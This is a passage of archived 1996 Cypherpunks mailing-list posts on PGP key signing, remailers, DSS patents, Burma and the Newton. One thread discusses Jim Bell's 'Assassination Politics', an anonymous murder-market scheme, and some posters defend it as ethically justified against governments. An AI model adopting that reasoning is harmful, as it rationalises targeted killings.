> that they come with infrared-- what are the specs on that
> communications device?  And about the Newton itself:  can it
> compile ANSI C code?  How much RAM?  Permanent storage?  Speed
> of crypto operations?
> 
> Dec -
>         The Newton's infrared is essentially the SHARP "ASK" protocol,
> which is the same as used by the sharp wizard.  It is *not* IrDA
> compatible, and Apple claims that it's a hardware problem not a software
> problem.  The Newton cannot currently compile ANSI C unless you have very
> close ties to Apple (internal code development is in C), but they will be
> releasing C tools for the Newton within a couple of months.  The C, of
> course, is not directly compiled on the Newton, but on a host Mac.  The
> Newton ships with between 1 and 2 megs of internal RAM, but can be expanded
> with FLASH or SRAM cards, but there's only one slot, so putting in a modem
> could be tough.. ;)  The permanent storage *is* RAM.  It's all flash.  As
> for speed, it depends on whether you do it in NewtonScript or C.
> NewtonScript is compiled to P-Code that runs on a virtual machine, and is
> really not too bad.  you can also compile to straight ARM code if you want.
> The next Newton to come out will be based on the DEC StrongARM which I
> understand is blindingly fast..
> 
> Hope this helps
> 
> Dan
> 
> --------
> Dan Rowley
> Innovative Computer Solutions
> Developers of fine software for the Newton
> Now, also developers for Be!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Mon, 20 May 1996 15:22:06 +0800
To: cypherpunks@toad.com
Subject: Burmese Excommunication
Message-ID: <2.2.32.19960520014352.00683f44@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:54 AM 5/19/96 -0700, you wrote:
>Cypherpunks is not a political newsgroup.
>
I agree; I am concerned, however, when I read that any government, theirs or
ours, acts or prepares to act to stop or stifle the free traffic of information.

Your point is well taken; my post was intended for information and perhaps
discussion value. Take it as you choose.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ/M2CKJGkNBIH7lAQHZZAP+KVLlk6REEaL4sskjV7mM28uMOOzGLxxf
3lf3UZGheizpgx6Ms3QpOyJpAADg365R4Lsgusynih49PM2EF+LLs1fNu6dUxbTm
beXwK1UJBiBQhglL6pG5tKbjf8vQTdZWOBkEIVLjw4vsPQJlsRlAc8jkijJ/sq/+
uYd0Rof3boY=
=adoY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: timd@consensus.com (Tim Dierks)
Date: Mon, 20 May 1996 17:35:02 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <v02140b04adc5a4e257fa@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 PM 5/19/96, Bill Stewart wrote:
>On the other hand, NIST has been saying that DSS isn't covered by any patents,
>which the PKP folks had some very negative, skeptical comments about,
>before PKP fell apart; it probably still is covered by the Cylink/Stanford
>patents until they expire next year, though it's not covered by RSA.
>The patent licensing hassles probably have kept a lot of people from using it,
>except for specific sales to the government.

Not to mention the Schnorr patent, which is good until 2008. NIST has
claimed DSA doesn't infringe upon patents, but they won't necessarily help
you in court, let alone indemnify you. I think everyone is using RSA
because it's easy, safe and already widely deployed. Since you've got to
buy a BSAFE license to do any interesting commercial cryptography anyway,
why go through the hassle of another algorithm? Cylink is pushing DSA,
however, because with DSA + Diffie-Hellman, you get both encryption and
signing, thus providing a similar set of capabilities to RSA.

Note, also that a DSA implementation might be usable as to do ElGamal or
RSA encryption; I don't know whether generally available commercial /
exportable implementations can or not. [Applied Cryptography, 2nd ed.,
490-491]

 - Tim

PS - Anyone know what the ASN.1 AlgorithmIDs and public key formats are for
DSS? I'd like to add support for DSS X.509 certs to my X.509 library. Even
better would be a couple of such certificates so I can test.
PPS - Any chance the original rumor surrounded RCA/Hughes' DSS satellite TV
system, and not the Digital Signature Standard, and we've all been barking
up the wrong tree?

Tim Dierks - Software Haruspex - tim@dierks.org

"That's the trouble with technology. It attracts people who have nothing
to say." - Muffey Kibbey, mother [Wall Street Journal, May 10 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 20 May 1996 17:40:13 +0800
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605200050.UAA15010@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960519221439.18178K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> > EVERYONE GETS A HIGH SCHOOL DIPLOMA --> HIGH SCHOOL DIPLOMAS BECOME WORTHLESS
> > EVERYONE GETS A PHD --> PHDS BECOME WORTHLESS
> 
> Will someone please buy this man a shift key and some Thorazine?



    Yeah, next thing ya know, somebody will be claiming that Physics PHds 
can't get work now, and that MD's being out of work is right around the 
corner. (Newly minted board-eligible Pathologists have it worst, right now).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 19:32:30 +0800
To: cypherpunks@toad.com
Subject: Re: Senator Leahy, your public key please?
Message-ID: <199605200524.WAA16354@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Senator Leahy is the first member of Congress to publicize a PGP key.
(There are already fake keys for Bill and Hillary Clinton and Al Gore.)
A Washington-area Cypherpunk recently visited Senator Leahy's office
and asked if he could verify that the PGP key posted to the net for
Senator Leahy was correct*, so he could sign it; while it would be
difficult to fake responses to the "PGP Public Key" entry on his web page,
it could be done, and a fake key could be publicized in other ways.
He was told that there's some Congressional silliness about the issue -
what's the political implication of having someone sign your key?
Postmaster@senate.gov is fine, but are there ethics questions if 
ACT UP, Big Oil or the Christian Coalition signs it, or if Newt Gingrich
or your party's Majority Leader refuses to sign it - are those endorsements?

Tim May pointed out that you don't _need_ anybody's permission to sign
their key; just do it and send to the keyserver.  Even if they don't like you.
>What if, for example, Sen. Leahy _did_ end up in the web of trust for Aryan
>Nation?  Even if he never intended it, this could have some severe PR
>repercussions.
>An exciting new world we're entering.

It's really hard to get handed a straight line like this and have to 
pass it up, but I'm _not_ going to create an Aryan Nations key,
and I'm _not_ going to send it to keyserver@canopener.worms.mit.edu.

Black Unicorn's experience at Senator Leahy's office implies there
are too many clueless Congresscritters around who would recognize
the political potential and make a Law to Do Something about it,
just as Georgia recently made a law against making links to people's
web sites without their permission.  While the Republicans in Congress,
having somehow found themselves on the side of Free Speech with Leahy 
against Clinton's administration, may be able to pass laws reducing the 
government's encryption-export and wiretapping efforts, a good scare 
like this could make it more difficult.  Sigh.  :-)
I haven't Cc:d this to Leahy - Should I?

Meanwhile, what should we do about PGP key signatures?  
PGP 3.x is still being developed, and keyservers can be updates as needed.  
While I agree that keyservers don't need to validate keys - that's a
job for the web of trust, and the keyserver-admin could sign keys
if he/she/it wanted to - it may make sense for the keyservers to only 
accept keys in messages signed by the key itself.  (Just signing the key
doesn't help much here; you need to sign the key-plus-signatures.)
Does it make sense to include some similar capability in PGP itself?

Leahy has at least signed his own key...
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 17:57:45 +0800
To: middle-man-admin@alpha.c2.org
Subject: Re: New Remailer (hidden)
Message-ID: <199605200544.WAA16819@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Cool.  I've got a test message going now.
Does your remailer accept PGP-encrypted email?
It's really critical for high-security applications,
at least for first remailer hops, but your key's not on
the MIT keyserver.

BTW, how do we know you're not a plant?  :-)
Aside from having an interesting nym,
you've probably got the first remailer that
makes it difficult to tell who's running it.
You could be Sameer, or you could be Louis Freeh,
but we don't know.  At least folks like Xenon were
known to be real people....

Even if you _are_ a plant, of course, we can still use
your system, but I'd want to do encrypted email through
other remailers on one end or the other.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 20 May 1996 16:46:00 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <2.2.32.19960519152746.00392f04@mail.pi.se>
Message-ID: <Pine.LNX.3.93.960519223102.1793C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 May 1996, Matts Kallioniemi wrote:
> 
> IP spoofing would do this nicely.Since SMTP doesn't require any
> significant responses, you can send blind and fake your IP address.
> To do that you need root access on your mailer machine and an
> ISP that doesn't sniff and filter its network for spoofing attacks.

	It is my understanding that IP spoofing will become much more
difficult, if not impossible when IP6/whatever gets put into place. It
seems to me that IP spoofing is not a long term option. 

	Deep Thought Question for the Constitutional Scholars:

	What chance would a remailer operator have in the court system
today positing the following set of circumstances:

	1. Case is concerns retrans of either copyrighted/trade secret
material (i.e. CO$ shit) or basically anything _but_ child porn or a
murder contract.
	
	2. Remailer operator did not violate any laws. 

	3. Remailer operator has big enough legal guns (ala EFF & ACLU
etc.) to back him.

	I realize that this would be a civil case rather than a criminal
one, maybe it would have to be child porn or something illegal to get that
far, but if I were to set up a remailer under my real name, and the CO$
came after me, given that I had the financial backup to carry the case to
trial, what are my chances? 
	Would it be worth it to do a Scopes Monkey Trial like case on
this, get someone willing to take the chance, and establish that it _is_
legal to run a remailer? I might be willing to be the test case for this,
but I would need to know the ramifications, and I would need to get my
wifes approval for this, and I don't want to expose Suba to any liability
in this. (So relax Alex).

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 20 May 1996 17:28:54 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605192015.NAA15002@netcom17.netcom.com>
Message-ID: <Pine.LNX.3.93.960519230556.1793E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 May 1996, Vladimir Z. Nuri wrote:
> not!!! I should have made this clear, but imho no matter how favorably
> the public sees anonymity, I still believe there will be little
> incentive to run remailers until there is some kind of ecash

	Sometimes "Just Because" is enough. There are people running them
right now with no incentive. As long as there isn't a _huge_ disincentive
to run one, there will be several running, if only because there are
people who _want_ to use one, so they run one. 

> scheme. you are going to have "bad" uses of anonymity going on as
> long as you provide the capability. ask the remailer operators to
> estimate how much of their mail is simply taunts between college
> students or sexual harassment. I doubt you will ever be able to
> evade this.

	If they know the answer to this question, then they are treading a
dangerous ground. 

> by liability I am also referring to a situation in which the 
> internet provider is pressured to quit the service by *anyone* not
> necessarily agents of the government. past examples are strong evidence
> that it does not at all require a government to shut down a remailer
> via pressure. anon.penet.fi at one point was pressured to shut down
> by "a well known net celebrity"

	Did penet.fi fold? Apparently not. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Mon, 20 May 1996 14:01:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why the Poor are Mostly Deserving of their Fate
In-Reply-To: <adc4abd70b0210044c37@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960519231030.7091D-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 May 1996, Timothy C. May wrote:

> At 10:32 PM 5/18/96, Sean Gabb wrote:
> >On Sat, 18 May 1996, Duncan Frissell wrote:
> >
> >> It was understandable to be poor when all the world was poor.  It is
> >> understandable to be poor in those nations today that make the
> >> accumulation of wealth a crime for most people.  It is not understandable
> >> to be poor (for long) in the US where one can reliably get out of poverty
> >> simply by doing three simple things:
> >>
> >> 1) get a high school diploma
> >> 2) get married
> >> 3) get any job
> >>
> >> Only about 2 tenths of 1% of those who satisfy those three requirements
> >> incomes below the official poverty line.
> 
> >I've done all these things - and rather more in the way of education.  But
> >while I don't fall on or near the poverty line, I'm still poor as a church
> >mouse.  What am I doing wrong?
> 
> 
> * Point Number One: Sean Gabb <cea01sig@gold.ac.uk>
>                                                 ^^
> * Point Number Two:"...not understandable to be poor (for long) in the US"
>                                                                        ^^
> Q.E.D.

Ah, fair point.  England is not exactly a land of opportunity.  If it
were, there wouldn't be an America.  Perhaps my Irish ancestors should
have gone west rather than east.

Sean Gabb.

> 
> 
> Actually, I think Duncan's "high school + marriage + any job" point is a
> bit simplistic, and I'm surprised about the ".02%" estimate. As someone
> else noted, there are a lot of folks in the rural South, Appalachia, and
> other places, who graduated from high school, are still married, and have
> some sort of job, and yet who make $6-8 an hour or less.
> 
> I think more is needed. I would have added "savings/investment" and "hard work."
> 
> Those who can force themselves to set money aside for investment get the
> compounded returns later on. And of course hard work--including taking a
> second job, having the extended family work, etc.--is also key.
> 
> (Many immigrant Asians arrive penniless in the U.S., then get help from
> immigrant Asian who arrived earlier, live in crowded houses and apartments,
> have 4-6 wage-earners in a household, save as much as they can, and then
> open a small business. Success is almost inevitable. Hence the cycle
> continues. This tradition of the various Asian subcultures is almost
> completely lacking in certain other subcultures in America. More's the
> pity.)
> 
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 20 May 1996 16:44:24 +0800
To: Pat Trainor <ptrainor@aura.title14.com>
Subject: Re: Assassination Politics 1-3
Message-ID: <9605200337.AB02122@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 May 96 at 20:31, you, Pat Trainor, wrote:

> On Sun, 19 May 1996, Jean-Francois Avon wrote:

> > Back to AP, I did not invent the scheme nor do I approve or like
> > it a lot.  But I find it very interesting to discuss.
> > 
> > The author of AP is Jim Bell <jimbell@pacifier.com>.
> 
>  That was what I was interested in. You see, I read a story exactly
> along the same lines a long time ago, and I thought the group would
> like to know just what happenned during that 'scheme'.
> 
> > I would gladly read the long letter that you wrote.
> 
>  Here's the text, and if you didn't see it posted, please repost
> with a cc to Mr. Bell. If you did see it, then just erase.. But the
> damnest thing that my email is so squirrely!!
> 
>  Thanks again!!
> 
> (if anyone wrote me in a reply, I never got it. ISP is putting a new
> T1 in, and this is causing errors in traffic I'm told.)
> 
> >From ptrainor@aura.title14.com Sun May 19 20:23:48 1996
> Date: Thu, 16 May 1996 22:09:16 -0400
> From: Pat Trainor <ptrainor@aura.title14.com>
> To: jimbell <jimbell@pacifier.com>
> Newsgroups: talk.politics.crypto, talk.politics.libertarian,
>     alt.politics.libertarian, alt.society.anarchy, alt.privacy,
>     alt.security.pgp, alt.activism, alt.anarchism, alt.cyberpunk,
>     alt.politics.datahighway
> Subject: Re: Insurable Interest Assassination Politics 1-3
> 
> On Thu, 9 May 1996, jimbell wrote:
> 
> > > How will this be enforced, someone with more resources,
> > >money, drugs, guns, better planned religion, icbms, will start to
> > >gather "like minded individuals" and start to tell others how to
> > >live., some will join them, others will fight, and we're back
> > >where we started.
> > 
> > No, because any threatening individual or group will be "predicted
> > to death" posthaste.
> 
>  I haven't followed this thread from the beginning, but I recognize
> the theme. I read _eons_ ago a short story in which this exact
> mechanism was used to enforce a leaderless society. Now I'm no
> economist, nor historian (future or otherwise) but I do vividly
> remember this story.
>  It was in a science-fiction compilation, as I was very prone to
> read (Nebula Awards, etc..) in my early days in the military and
> before.
> 
>  My question would be: have you ever read a story with this precice
> theme? The assisns looked like (sorry) Star Wars storm troopers in
> white, air conditioned suits. They were not anonymous, except that
> you couldn't see their faces (is that enough?).
> 
>  The story treated the same (apparently) hypothesis you mention. The
> 'Assassin's Guild' I think was the title.

Irrelevant to AP since nobody knows anybody, nor what anybody else 
do.
 
>  One of the problems in the model I read about was that the area to
> be policed was too large to allow an elite minority to cover
> properly, or even effectively.

Again, irrelevant to AP.  This scheme suppose some clan against 
another (the govt).  Re-read Jim Bell's essay and you'll realize that 
it wouldn't work that way at all.

>  It was a situation of ratios. To be superior, even with a
> technological edge, you need numbers. You have to offset the balance
> somehow. Population control was attempted by the guild in the end as
> a measure to increase the odds in their favor. This caused an
> understandably intense reaction with the masses, who were ultimately
> those being served.

Not in AP.  Because the aim when using AP against government or any 
other entity is not to get rid of it by killing it's members, but 
rather to get rid of it by scaring any individual that would 
participate to it.
 
>  Another problem was that the technology required for a large
> coordinated effort required organization of a military nature (rank,
> etc..). This was necessary due to the myriad of decisions that had
> to be made.



<Lots of stuff absolutely irrelevant to AP deleted>.  

Re-read the essay again. 


>  Surveillance was the issue. In order for the Guild to be able to
> identify a problem, an immense amount of surveillance was required.
> Again the technology and the infrastructure required to support it.

Are you saying that problems are difficults to identify?


>  The decision had to be made by superiors who were in touch with all
> the information from all areas under surveillance to make the
> ultimate decision. There needed to be, effectively, a steering
> committee to determine if the proposed action was both affordable
> and warranted.



To Cypherpunks: I did not write the following paragraph.  It was
probably from Jim Bell, but I only guess.  

To: Pat Trainor: Ask Jim Bell to send you his paper. I'm
sure he will do it wilfully.

Pat Trainor wrote:
>somebody wrote:

> > To the eventual outcome.  The system's inevitable.  Read the
> > essay; it explains why.   I'll forward it to you; I assume it's no
> > longer available on your newsfeed.
> 
>  I wouldn't mind reading it, it sounds a lot like what I'm
> describing.
> 
> > They might be wrong.  I might be right.
> 
>  The Assassin's Guild was bought into in phases by the ruling
> elements of all major powers only after they had all lost their
> ability to maintain an effective repel borders and the place (earth)
> was a mess.
> 
>  Realistically, you can't build from the ashes any faster than
> anyone else is. And human nature doesn't change because of a new
> caveat in religion or 'law'. A human will always be a human,
> regardless of what law they proport to follow or heed.
> 
> > Thomas Edison tried hundreds of differnet materials to make light
> > bulb filaments before he found one that would work.
> 
>  Actually he directed experiments! :) But this statement reminded me
> of the 'Infinite Number of Monkeys' theory, except applied to 'self
> rule', well, I guess not, well..?
> 
> > And BTW, we're already all "in fear of our lives."  You know,
> > muggings and carjackings.    How is my system worse,
> > quantitatively?
> 
>  Actually, you'll find folks doing the most desparate things in a
> desparate world. If you try to forge order out of chaos, you quickly
> find that the order you are trying to enforce feeds the chaos. You
> create your own increasing difficulty by default. A society (or
> group of societies) in anarchy will fear order. This, coupled with
> the fact that you have to create from the same resoucres the masses
> have access to, makes your efforts incredibly difficult. You will
> never find a unified agreement among a society that can't feed or
> cloth itself. If you do, you instantly become what you are telling
> the people you are trying to prevent. Folks will see through this
> veil and vanquish such an effort favoring a predictable anarchy over
> a concerted organized rule.
> 
> > >To change the world you have to understand the rules,
> > 
> > But you don't necessarily have to _follow_ the rules!
> 
>  That's a good point, and one I think I've shown means that you will
> always have rules. Sometimes yours, sometimes theirs, if lucky a bit
> of both.. But they will be there. We are a self-righteous
> pack-oriented species. We thrive on group individuality! That must
> be why psychologists make so much money!
> 
> > The system I've described will work even if only a small
> > proportion of the population uses it, at first.  That's what makes
> > it so amazing, really.
> 
>  Again, I'd appreciate a look at your paper. 
> 
>  Now for the subtle problems pointed out accurately in the
> Assassin's Guild. As a strategic planner for a living, I have
> learned to live by a good rule: Make your best estimates for a
> project's completion, then double them.
> 
>  A support structure required for the Assassin's Guild required
> things you would never immediately think of. Support from several
> areas are required. Remember, you are basically operating a country
> with soft borders covering all areas, no matter how distant.
> 
>  For solely the guild's efforts, no others, a few of the things
> required are:
> 
> Manufacturing
> Fabrication
> Research & Developement
> Quality Assurance
> Medical
> Clothing
> Shelter
> Food
> Recreation
> Self-Rule
> Coordination
> Information Exchange
> Communication
> Information Retrieval
> Surveillance
> Commerce
> Expansion
> Earth Sciences
> 
>  The trouble is, each and every one of the above is subject to
> espionage, revolution, corruption, pranks, etc.. Therefore each must
> be treated with complete encapsulation within the guild. The only
> way to exclude interference from within or without, was to closely
> monitor each and every aspect of the guild's organization.
> Self-policing.
> 
>  When you start visualizing what the organization would actually be
> running (never mind the seemingly impossible task of starting the
> organization from scratch), it seems a very impractical proposition.
> 
>  Plus, the guild found all the military stuff laying around pretty
> useful.. Folks were NOT excited about another police state..
> 
>  Anyhow, sorry for the long post, but I thought perhaps you'd enjoy
> the problems the Assassin's Guild had, and compare it to your own
> model.
> 
> later!
> 
> pat
> :)
> 
>      Pat Trainor * WARNING: THE OPINIONS I EXPRESS MAY NOT BE MY OWN
>      * finger for key: ptrainor@aura.title14.com
>      http://www.title14.com/ 
>     Key fingerprint =  4B 14 97 D7 11 41 35 76  28 43 1E E3 2E E3 81
>     D6 "Winning may not be everything, but losing is NOTHING!" -Ed
>     Bighead
> 
> 
> 

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 20 May 1996 18:36:46 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <9605200337.AA02122@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry Vlad Z. Nuri, but this message was intended for Cypherpunks,
to be cc'd to you.

Unfortunately, I wrongly addressed it.

To CPunks: the reply that should have hit CPunks:
============================================================

To:               jf_avon@citenet.net
Subject:          Re: TCM: mafia as a paradigm for cyberspace 
Date sent:        Sun, 19 May 96 19:52:45 -0700
From:             "Vladimir Z. Nuri" <vznuri@netcom.com>

there is no ethical basis for killing.
please kindly keep your trash out of my mailbox

I've evaluated all sides of the story, and am
not influenced by corrupt machiavellianism

=============================================================



-------Original Message Follows -------
From:          Self <Single-user mode>
To:            "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject:       Re: TCM: mafia as a paradigm for cyberspace
Reply-to:      jf_avon@citenet.net
Date:          Sun, 19 May 1996 01:59:00

On 18 May 96 at 12:43, Vladimir Z. Nuri wrote:

> maybe talk to Jim Bell some more. perhaps
> eventually you will perfect the method of perpetrating the perfect
> killing!! I really do admire you, because killing people without
> getting caught is surely a great unrecognized art, and one of the
> most unappreciated and misunderstood. something that has only been a
> dream to the blighted wretches prior to our glorious new phases of
> cyberspatial technology, which makes human morality completely
> obsolete.

I think that you are writing way out of context.  

First, wether or not the AP scheme is used for the control of 
government, as Jim Bell pushes it, does not mean that it will not be
implemented for other purposes, such as killing successful businessman
or your neighboor's son who is screwing your wife (noticed that she
smiles all the time since a while? ) .

Second, everybody like Jim Bell who is pushing the AP scheme is doing
so on ethical basis: that the coercion the government imposes on to
the individuals by regulations, and guns backed taxation justifies the
killings.  I have to see yet any cypherpunks who seems to agree with
AP that envision another use than govt control.

Third, you will notice that even Jim Bell discusses issues of 
anonymous transactions and businesses that, if conducted properly,
makes the AP scheme irrelevant.  So, it seems that AP is only a tool
instead of being an end in itself.

Fourth, you lack some basic psychological insight: intrinsic 
murderers do enjoy the knowledge of the details of their actions and
the derived perception of power.  AP prevents that by anonymising
everything: a donator cannot know if he caused the death of somebody
(unless he spends several tens of grands himself, but then, there are
other, more satisfying ways for a power seeker to fullfill his
passions...) .

You seems to oppose the proposed violence entailed by AP but you
positively blank out what everybody who reflected on AP put in the
opposite pan of the balance, i.e. the ethical standards of
contemporary govt actions.

And you'll also note that the anonymity issue generate more interest
from more CPunks because it (hopefully) will acheive the same goal
without any killing.

Until you accept to evaluate both side of the story, your 
recriminations opinions are as evident as the magnetic monopole...

jfa

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 20 May 1996 16:28:14 +0800
To: cypherpunks@toad.com
Subject: Virtual machines?
Message-ID: <9605200344.AA02438@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

Pardon my ignorance, but I had a few questions haunting me since a 
while.

Is there a way to have a remailer de-localize itself and relocalize 
itself over the internet?

For example, could there be several machines around the worlds that,
when you send an e-mail to it, is routed to differents physical
places of the world depending on where the actual remailer process is
actually running?  Could there be such a thing as a virtual machine
runing a remailer that gets to hop from physical machine to physical
machine around the world?

Just an idea to avoid jurisdiction problems.

Just asking, probably quite futilely...

Thanks

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 20 May 1996 20:44:44 +0800
To: RANTpunks <cypherpunks@toad.com>
Subject: Re: Cypherpunks, a political "newsgroup?"
In-Reply-To: <YlbtkU200YUz8Hj2db@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960520000505.27635B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 May 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 19-May-96  by anonymous-remailer@shell 
> > Cypherpunks is not a political newsgroup.
> 
> Hah! Most everything that's discussed here has political overtones. I,
> for one, appreciated in the info on the Burmese businessman and
> forwarded it to fight-censorship. I'll link it in to
> http://www.cs.cmu.edu/~declan/international/ when I get a chance.

Me Too!

I can't speak for the old Perry, but I think the Burma thing (government
outlawing communications technology) was perfectly on topic for this list.
I was also inclined to offer to help, if there's anything you think I
could do. I know a couple of grad students who are very interested in the
Burmese political situation, and if there's anything useful that can be
done technologically, I'd like to help.

The Hack China Contest isn't going very well, but perhaps Burma will be
easier. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 18:13:09 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 16 May 1996
Message-ID: <01I4WRKPGQXS8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 16-MAY-1996 23:29:38.03

>AOL TEAMS UP FOR E-COMMERCE
>America Online has cut deals to license encryption, digital signature, and
>electronic transaction and funds transfer technologies from a variety of
>companies, including CyberCash, IBM infoMarket, RSA Data Security, Terisa
>Systems and VeriSign.  "These new relationships will provide the building
>blocks for a secure electronic commerce platform," says AOL's VP of product
>marketing.  The online service plans to integrate the electronic commerce
>technologies into both its online service and its Global Network Navigator
>Internet access service.  (Investor's Business Daily 16 May 96 A9)

	Well, at least they're making moves to get cryptography to the AOL
masses.... although somehow I suspect that they'll roll over and play dead for
any and all GAK pressure, and won't use any variety of truly anonymous digital
cash.

>ATTEMPT TO BLOCK USE OF CANADIAN SATELLITES
>MCI Communications, AT&T and EchoStar Satellite all have filed additional
>complaints this week with the FCC about proposals made by rivals
>Tele-Communications Inc. and TelQuest Ventures that cite Ottawa's refusal to
>allow American companies to beam their programs into the United States as
>cause for the FCC to deny the application. (Toronto Financial Post 16 May 96
>p3)  An ex-FCC official says the American regulator is unlikely to approve
>the use of four Canadian satellites by US-based TelQuest Ventures and
>Tele-Communications Inc. to beam signals to the American market unless
>Canada's market is opened up to U.S. services. (Montreal Gazette 15 May 96 G3)

	One wonders what the FCC would do if they weren't US-based companies,
and if it weren't from satellites from such an interlocked-with-the-US country
as Canada.
	-Allen	

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Jack Kerouac (if your name is Jack Kerouac;  otherwise, substitute your own
>name).  ...  To cancel, send a message to: listproc@educom.unc.edu with the
>message: unsubscribe edupage.   (If you have subscription problems, send
>mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 17:31:35 +0800
To: frantz@netcom.com
Subject: Re: The Crisis with Remailers
Message-ID: <01I4WS2XKN788Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 17-MAY-1996 15:56:36.35

>Perhaps what is needed is a non-profit, charitable 501c foundation to
>encourage anonymous communication.  Those who support the idea could make
>tax deductible contributions which would be used for grants, public
>education etc. etc. to encourage anonymous communication.  It could be
>called, "The Federalist Foundation" because the Federalist Papers were
>published anonymously.

	Hmm... I wonder if it would be good for this Foundation to itself
